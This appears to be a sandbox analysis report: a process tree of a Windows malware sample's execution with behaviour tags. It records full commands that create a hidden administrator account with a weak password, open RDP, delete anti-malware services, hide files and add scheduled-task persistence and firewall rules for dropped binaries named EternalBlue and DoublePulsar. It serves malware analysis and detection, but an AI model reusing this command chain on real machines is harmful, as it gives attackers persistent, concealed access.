        5⤵
        Views/modifies file attributes
        
        PID:5708
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:3640
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:6044
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:2892
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:5732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:5680
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:5244
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1352
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5740
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:668
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5372
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:5712
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:4996
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5392
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:5216
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:5940
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1540
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:6016
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5476
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:6088
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:124
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:1576
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:3200
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3644
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5836
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1384
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:3768
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:6016
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1616
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:772
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:5132
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5392
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6088
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:3440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        Hide Artifacts: Hidden Users
        
        PID:936
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5568
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4616
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6004
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:5296
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Executes dropped EXE
      PID:2228
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5768
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC37.tmp\CC38.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:5784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5240
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Modifies visiblity of hidden/system files in Explorer
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:5276
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5956
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:1208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:4740
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:5168
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:5800
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1540
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4572
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5792
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4572
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:4112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:5368
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:5712
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:5272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:5900
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:5076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:1116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6048
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5568
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:5456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:5476
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:5780
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:5872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:5980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:6008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:6052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:2368
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:5368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:5424
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:5452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5024
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:2592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:5688
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:5768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2172
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:5792
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:6000
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:1784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:6008
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:5972
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4124
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:6052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4252
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:5216
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:5464
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:768
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:5708
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:6080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4544
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:5936
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:5948
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:3976
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:5608
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:5884
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:5848
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5732
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5928
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:5852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5684
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:5412
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:5792
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5772
